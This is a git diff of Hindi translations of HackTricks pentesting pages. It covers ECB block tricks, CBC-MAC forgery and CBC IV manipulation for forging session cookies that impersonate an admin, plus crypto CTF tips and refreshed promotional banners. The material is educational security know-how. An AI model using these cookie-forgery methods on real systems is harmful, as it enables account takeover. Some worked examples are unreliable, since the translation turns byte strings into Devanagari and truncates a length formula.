**दोनों उपयोगकर्ताओं की जानकारी** समान हैं, **बराबर** हैं। तो, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है**। -जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** हैं। +जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** है। ``` \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` -यह इसलिए है क्योंकि **कुकीज़ के उस उपयोक्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल थे** (उदाहरण के लिए)। वे **ब्लॉक** जो **विभिन्न** हैं, वे उन ब्लॉक्स हैं जिनमें **कम से कम 1 विभिन्न वर्ण था** (शायद विभाजक "|" या उपयोक्ता नाम में कोई आवश्यक भिन्नता)। +यह इसलिए है क्योंकि **कुकीज़ का उपयोगकर्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल था** (उदाहरण के लिए)। **विभिन्न ब्लॉक** वे ब्लॉक हैं जिनमें **कम से कम 1 विभिन्न वर्ण शामिल था** (शायद विभाजक "|" या उपयोगकर्ता नाम में आवश्यक भिन्नता)। -अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयोक्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयोक्ता नाम>` है। इसके लिए, वह **कई उपयोक्ता नाम** उत्पन्न कर सकता है **जिनमें समान और लंबे उपयोक्ता नाम और पासवर्ड हों** जब तक वह प्रारूप और विभाजक की लंबाई को न पाए: +अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयोगकर्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयोगकर्ता नाम>` है। इसके लिए, वह बस **कई उपयोगकर्ता नाम** उत्पन्न कर सकता है जिनमें **समान और लंबे उपयोगकर्ता नाम और पासवर्ड** हों जब तक वह प्रारूप और विभाजक की लंबाई का पता नहीं लगा लेता है: -| उपयोक्ता नाम की लंबाई: | पासवर्ड की लंबाई: | उपयोक्ता नाम + पासवर्ड की लंबाई: | कुकी की लंबाई (डिकोडिंग के बाद): | +| उपयोगकर्ता नाम की लंबाई: | पासवर्ड की लंबाई: | उपयोगकर्ता नाम + पासवर्ड की लंबाई: | कुकी की लंबाई (डिकोडिंग के बाद): | | ---------------- | ---------------- | ------------------------- | --------------------------------- | | 2 | 2 | 4 | 8 | | 3 | 3 | 6 | 8 | @@ -52,7 +52,7 @@ ECB का उपयोग करने के कई सुरक्षा प ## पूरे ब्लॉक हटाना -कुकी के प्रारूप को जानकर (`<उपयोक्ता नाम>|<पासवर्ड>`), उपयोक्ता नाम `एडमिन` का अनुकरण करने के लिए एक नया उपयोक्ता बनाएं `aaaaaaaaadmin` और कुकी प्राप्त करें और इसे डिकोड करें: +कुकी के प्रारूप को जानकर (`<उपयोगकर्ता नाम>|<पासवर्ड>`), उपयोगकर्ता नाम `admin` का अनुकरण करने के लिए एक नया उपयोगकर्ता बनाएं `aaaaaaaaadmin` और कुकी प्राप्त करें और इसे डिकोड करें: ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` @@ -61,19 +61,19 @@ ECB का उपयोग करने के कई सुरक्षा प ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` -## ब्लॉक्स को हटाना +## ब्लॉक्स को ले जाना -कई डेटाबेस में `WHERE username='admin';` खोजना या `WHERE username='admin ';` खोजना समान होता है _(अतिरिक्त रिक्त स्थानों का ध्यान दें)_ +कई डेटाबेस में `WHERE username='admin';` खोजना या `WHERE username='admin ';` खोजना एक ही बात है _(अतिरिक्त रिक्त स्थानों का ध्यान दें)_ -इसलिए, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है: +तो, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है: -* एक उपयोगकर्ता नाम जेनरेट करें जो: `len() + len(` 2 ब्लॉक्स को जेनरेट करेगा। -* फिर, एक पासवर्ड जेनरेट करें जो उस उपयोगकर्ता नाम और रिक्त स्थानों को भरेगा, जिसे हम अनुकरण करना चाहते हैं, जैसे: `admin ` +* एक उपयोगकर्ता नाम जेनरेट करें जो इस प्रकार हो: `len() + len(` 2 ब्लॉक्स को उत्पन्न करेगा। +* फिर, एक पासवर्ड जेनरेट करें जो उस उपयोगकर्ता को अनुकरण करने और रिक्त स्थानों को भरने के लिए ब्लॉक्स की एक सटीक संख्या में होगा, जैसे: `admin ` -इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता नाम का नकली है): `username |admin ` +इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता का अनुकरण कर रहा है): `username |admin ` -** फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`** +**फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`** -# संदर्भ +## संदर्भ * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) diff --git a/crypto-and-stego/rc4-encrypt-and-decrypt.md b/crypto-and-stego/rc4-encrypt-and-decrypt.md index f16d8a112..1af06fd5f 100644 --- a/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} यदि आप किसी प्लेनटेक्स्ट को RC4 का उपयोग करके एन्क्रिप्ट कर सकते हैं, तो आप उस RC4 द्वारा एन्क्रिप्ट किए गए किसी भी सामग्री को (एक ही पासवर्ड का उपयोग करके) केवल एन्क्रिप्शन फ़ंक्शन का उपयोग करके डिक्रिप्ट कर सकते हैं। @@ -20,3 +21,22 @@ {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} + + + + + +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +हैकट्रिक्स का समर्थन करें + +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में। + +
+{% endhint %} diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md index 5c0040cdf..8bd850032 100644 --- a/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -1,29 +1,30 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में **पीआर जमा करके**।
+{% endhint %} # CBC -यदि **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**व्यवस्थापक**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** का **ब्रूटफोर्स** कर सकते हैं। +अगर **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**एडमिन**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** को **ब्रूटफोर्स** कर सकते हैं। # CBC-MAC -रहस्यमयता में, एक **साइफर ब्लॉक चेनिंग संदेश प्रमाणीकरण कोड** (**CBC-MAC**) एक तकनीक है जिसका उपयोग एक ब्लॉक साइफर से संदेश प्रमाणीकरण कोड निर्मित करने के लिए किया जाता है। संदेश को कुछ ब्लॉक साइफर एल्गोरिदम के साथ सीबीसी मोड में एन्क्रिप्ट किया जाता है ताकि प्रत्येक ब्लॉक पिछले ब्लॉक के सही एन्क्रिप्शन पर निर्भर हो। यह आपसी आश्रितता सुनिश्चित करता है कि किसी भी प्लेनटेक्स्ट **बिट्स** में कोई **परिवर्तन** होने पर **अंतिम एन्क्रिप्टेड ब्लॉक** को एक ऐसे तरीके से **परिवर्तित** करेगा जिसे पूर्वानुमान या ब्लॉक साइफर कुंजी को नहीं जानकर नहीं रोका जा सकता। +**साइफर ब्लॉक चेनिंग मैसेज प्रमाणीकरण कोड** (**CBC-MAC**) एक विधि है जो गुप्तशास्त्र में प्रयोग की जाती है। यह एक संदेश लेकर उसे ब्लॉक द्वारा एन्क्रिप्ट करने के द्वारा काम करता है, जहां प्रत्येक ब्लॉक की एन्क्रिप्शन पिछले ब्लॉक से जुड़ी होती है। यह प्रक्रिया एक **ब्लॉकों की श्रृंखला** बनाती है, जिससे सुनिश्चित होता है कि मूल संदेश के एक भी बिट को बदलने से एन्क्रिप्ट किए गए डेटा के अंतिम ब्लॉक में एक अपूर्व परिवर्तन होगा। इस परिवर्तन को बनाने या उलटने के लिए, एन्क्रिप्शन कुंजी की आवश्यकता होती है, जो सुरक्षा सुनिश्चित करती है। -संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को सीबीसी मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक संदेश का CBC-MAC की गणना करने की रूपरेखा दी गई है![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) एक गुप्त कुंजी k और एक ब्लॉक साइफर E के साथ: +संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को CBC मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक गुप्त कुंजी k और एक ब्लॉक साइफर E के साथ ब्लॉकों से बने संदेश![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) की CBC-MAC की गणना की गई है: -![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) +![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) # सुरक्षा दोष @@ -33,49 +34,50 @@ CBC-MAC के साथ आम तौर पर **इस्तेमाल क * `E(m1 XOR 0) = s1` * `E(m2 XOR 0) = s2` -फिर m1 और m2 को जोड़कर बनाया गया संदेश (m3) 2 हस्ताक्षर (s31 और s32) उत्पन्न करेगा: +फिर, m1 और m2 को जोड़कर बनाए गए संदेश (m3) 2 हस्ताक्षर (s31 और s32) उत्पन्न करेगा: * `E(m1 XOR 0) = s31 = s1` * `E(m2 XOR s1) = s32` -**जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए गणना किया जा सकता है।** +**जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए भी गणना की जा सकती है।** -सोचिए आप **8 बाइट** ब्लॉक में नाम **प्रशासक** को एन्क्रिप्ट कर रहे हैं: +सोचिए आप **8 बाइट** ब्लॉक में नाम **व्यवस्थापक** को एन्क्रिप्ट कर रहे हैं: -* `Administ` -* `rator\00\00\00` +* `एडमिनिस्ट` +* `रेटर\00\00\00` -आप उपयोगकर्ता नाम **Administ** (m1) बना सकते हैं और हस्ताक्षर (s1) प्राप्त कर सकते हैं।\ -फिर, आप `rator\00\00\00 XOR s1` के परिणाम को उपयोगकर्ता नाम बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\ -अब, आप s32 का उपयोग **प्रशासक** के पूरे नाम के लिए हस्ताक्षर के रूप में कर सकते हैं। +आप उपयोगकर्ता नाम **एडमिनिस्ट** (m1) बना सकते हैं और हस्ताक्षर (s1) प्राप्त कर सकते हैं।\ +फिर, आप `रेटर\00\00\00 XOR s1` के परिणाम के नाम को बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\ +अब, आप s32 का उपयोग **व्यवस्थापक** के पूरे नाम के लिए हस्ताक्षर के रूप में कर सकते हैं। ### सारांश -1. उपयोगकर्ता नाम **Administ** (m1) का हस्ताक्षर प्राप्त करें जो s1 है -2. उपयोगकर्ता नाम **rator\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है**.** -3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **प्रशासक** के लिए एक मान्य कुकी होगी। +1. उपयोगकर्ता नाम **एडमिनिस्ट** (m1) का हस्ताक्षर प्राप्त करें जो s1 है +2. उपयोगकर्ता नाम **रेटर\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है**।** +3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **व्यवस्थापक** के लिए एक मान्य कुकी होगी। # हमला नियंत्रण IV यदि आप उपयोग किए गए IV को नियंत्रित कर सकते हैं तो हमला बहुत आसान हो सकता है।\ -यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**प्रशासक**" का उपयोगकर्ता बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\ -अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **प्रशासक** के लिए कुकी पुनः उत्पन्न कर सकते हैं। यह कुकी **प्रशासक** के उपयोगकर्ता का अनुकरण करने के लिए मान्य होगी। +यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**व्यवस्थापक**" का अनुकरण करने के लिए आप उपयोगकर्ता "**व्यवस्थापक**" बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\ +अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **व्यवस्थापक** के लिए कुकी पुनः उत्पन्न कर सकते हैं। यह कुकी **व्यवस्थापक** उपयोगकर्ता का अनुकरण करने के लिए मान्य होगी। -# संदर्भ +## संदर्भ -अधिक जानकारी [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +अधिक जानकारी के लिए [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) में देखें। +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में **पीआर जमा करके**।
+{% endhint %} diff --git a/cryptography/crypto-ctfs-tricks.md b/cryptography/crypto-ctfs-tricks.md index 1d3f09226..13f7d3b98 100644 --- a/cryptography/crypto-ctfs-tricks.md +++ b/cryptography/crypto-ctfs-tricks.md @@ -1,18 +1,19 @@ # क्रिप्टो सीटीएफएस ट्रिक्स +{% hint style="success" %} +**AWS हैकिंग सीखें और प्रैक्टिस करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
+{% endhint %} ## ऑनलाइन हैश डेटाबेस @@ -28,16 +29,16 @@ HackTricks का समर्थन करने के अन्य तरी * [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) * [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) -## जादू ऑटोसॉल्वर्स +## मैजिक ऑटोसॉल्वर्स * [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) -* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (जादू मॉड्यूल) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (मैजिक मॉड्यूल) * [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) * [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) ## एन्कोडर्स -अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डीकोड किया जा सकता है: +अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डिकोड किया जा सकता है: * [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) @@ -58,81 +59,34 @@ HackTricks का समर्थन करने के अन्य तरी ### बेस एन्कोडिंग्स ऑटोसॉल्वर इन सभी बेस को चेक करें: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) - -* **एस्की85** -* `BQ%]q@psCd@rH0l` -* **बेस26** \[_A-Z_] -* `BQEKGAHRJKHQMVZGKUXNT` -* **बेस32** \[_A-Z2-7=_] -* `NBXWYYLDMFZGCY3PNRQQ====` -* **Zबेस32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_] -* `pbzsaamdcf3gna5xptoo====` -* **बेस32 जियोहैश** \[_0-9b-hjkmnp-z_] -* `e1rqssc3d5t62svgejhh====` -* **बेस32 क्रॉकफोर्ड** \[_0-9A-HJKMNP-TV-Z_] -* `D1QPRRB3C5S62RVFDHGG====` -* **बेस32 विस्तारित हेक्साडेसिमल** \[_0-9A-V_] -* `D1NMOOB3C5P62ORFDHGG====` -* **बेस45** \[_0-9A-Z $%\*+-./:_] -* `59DPVDGPCVKEUPCPVD` -* **बेस58 (बिटकॉइन)** \[_1-9A-HJ-NP-Za-km-z_] -* `2yJiRg5BF9gmsU6AC` -* **बेस58 (फ्लिकर)** \[_1-9a-km-zA-HJ-NP-Z_] -* `2YiHqF5bf9FLSt6ac` -* **बेस58 (रिप्पल)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_] -* `pyJ5RgnBE9gm17awU` -* **बेस62** \[_0-9A-Za-z_] -* `g2AextRZpBKRBzQ9` -* **बेस64** \[_A-Za-z0-9+/=_] -* `aG9sYWNhcmFjb2xh` -* **बेस67** \[_A-Za-z0-9-_.!\~\_] -* `NI9JKX0cSUdqhr!p` -* **बेस85 (एस्की85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -* `BQ%]q@psCd@rH0l` -* **बेस85 (एडोबी)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -* `<~BQ%]q@psCd@rH0l~>` -* **बेस85 (IPv6 या RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] -* `Xm4y`V\_|Y(V{dF>\` -* **बेस85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` -* **बेस85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__] -* `Xm4y|V{~Y+V}dF?` -* **बेस91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_] -* `frDg[*jNN!7&BQM` -* **बेस100** \[] -* `👟👦👣👘👚👘👩👘👚👦👣👘` -* **बेस122** \[] -* `4F ˂r0Xmvc` -* **एटम-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_] -* `MIc3KiXa+Ihz+lrXMIc3KbCC` -* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] +* **हैज़15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] * `DmPsv8J7qrlKEoY7` -* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] +* **मेगान35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] * 